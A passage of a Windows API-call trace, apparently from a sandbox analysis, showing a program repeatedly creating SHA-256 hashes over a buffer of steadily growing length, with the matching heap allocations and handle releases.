	[0225.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ae40
	[0225.146] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ae40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ae40, pdwDataLen=0x128ba4) returned 1
	[0225.146] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.146] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.146] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.146] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.146] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0225.146] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ae68
	[0225.146] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277ae68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ae68, pdwDataLen=0x128ba4) returned 1
	[0225.146] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.146] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.147] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.147] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.147] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0225.147] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277ae90
	[0225.147] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277ae90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277ae90, pdwDataLen=0x128ba4) returned 1
	[0225.147] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.147] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.147] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.147] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.147] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0225.147] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aeb8
	[0225.147] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277aeb8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aeb8, pdwDataLen=0x128ba4) returned 1
	[0225.147] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.147] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.148] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.148] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.148] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0225.148] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aee0
	[0225.148] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277aee0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aee0, pdwDataLen=0x128ba4) returned 1
	[0225.148] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.148] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.148] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.148] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.148] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0225.148] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277af08
	[0225.148] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277af08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277af08, pdwDataLen=0x128ba4) returned 1
	[0225.149] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.149] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.149] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.149] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.149] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0225.149] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277af30
	[0225.149] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277af30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277af30, pdwDataLen=0x128ba4) returned 1
	[0225.149] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.149] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.149] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.149] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.149] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0225.149] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277af58
	[0225.150] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277af58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277af58, pdwDataLen=0x128ba4) returned 1
	[0225.150] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.150] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.150] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.150] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.150] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0225.150] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277af80
	[0225.150] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277af80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277af80, pdwDataLen=0x128ba4) returned 1
	[0225.150] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.150] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.150] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.150] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.150] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0225.151] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277afa8
	[0225.151] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277afa8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277afa8, pdwDataLen=0x128ba4) returned 1
	[0225.151] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.151] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.151] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.151] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.151] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0225.151] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277afd0
	[0225.151] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277afd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277afd0, pdwDataLen=0x128ba4) returned 1
	[0225.151] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.151] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.151] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.152] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.152] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0225.152] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277aff8
	[0225.152] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277aff8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277aff8, pdwDataLen=0x128ba4) returned 1
	[0225.152] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.152] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.152] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.152] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.152] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0225.152] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b020
	[0225.152] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b020, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b020, pdwDataLen=0x128ba4) returned 1
	[0225.152] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.152] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.152] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.153] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.153] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0225.153] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b048
	[0225.153] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b048, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b048, pdwDataLen=0x128ba4) returned 1
	[0225.153] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.153] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.153] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.153] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.153] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0225.153] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.153] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b070
	[0225.153] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b070, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b070, pdwDataLen=0x128ba4) returned 1
	[0225.153] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.153] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.153] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.154] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.154] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0225.154] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b098
	[0225.154] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b098, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b098, pdwDataLen=0x128ba4) returned 1
	[0225.154] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.154] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.154] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.154] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.154] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0225.154] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.154] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b0c0
	[0225.154] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b0c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b0c0, pdwDataLen=0x128ba4) returned 1
	[0225.154] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.154] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.154] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.155] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.155] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0225.155] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.155] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b0e8
	[0225.155] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b0e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b0e8, pdwDataLen=0x128ba4) returned 1
	[0225.155] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.155] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.155] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.156] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.156] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0225.156] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b110
	[0225.156] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b110, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b110, pdwDataLen=0x128ba4) returned 1
	[0225.156] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.156] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.156] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.156] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.156] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0225.156] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.156] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b138
	[0225.156] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b138, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b138, pdwDataLen=0x128ba4) returned 1
	[0225.156] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.156] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.157] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.157] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.157] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0225.157] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b160
	[0225.157] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b160, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b160, pdwDataLen=0x128ba4) returned 1
	[0225.157] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.157] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.157] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.157] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.157] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0225.157] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b188
	[0225.157] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b188, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b188, pdwDataLen=0x128ba4) returned 1
	[0225.158] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.158] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.158] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.158] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.158] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0225.158] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.158] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b1b0
	[0225.158] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b1b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b1b0, pdwDataLen=0x128ba4) returned 1
	[0225.158] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.158] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.158] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.158] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.158] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0225.159] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b1d8
	[0225.159] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b1d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b1d8, pdwDataLen=0x128ba4) returned 1
	[0225.159] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.159] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.159] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.159] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.159] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0225.159] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b200
	[0225.159] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x277b200, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b200, pdwDataLen=0x128ba4) returned 1
	[0225.159] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.159] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.159] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.159] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.160] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0225.160] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.160] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b228
	[0225.160] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x277b228, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x277b228, pdwDataLen=0x128ba4) returned 1
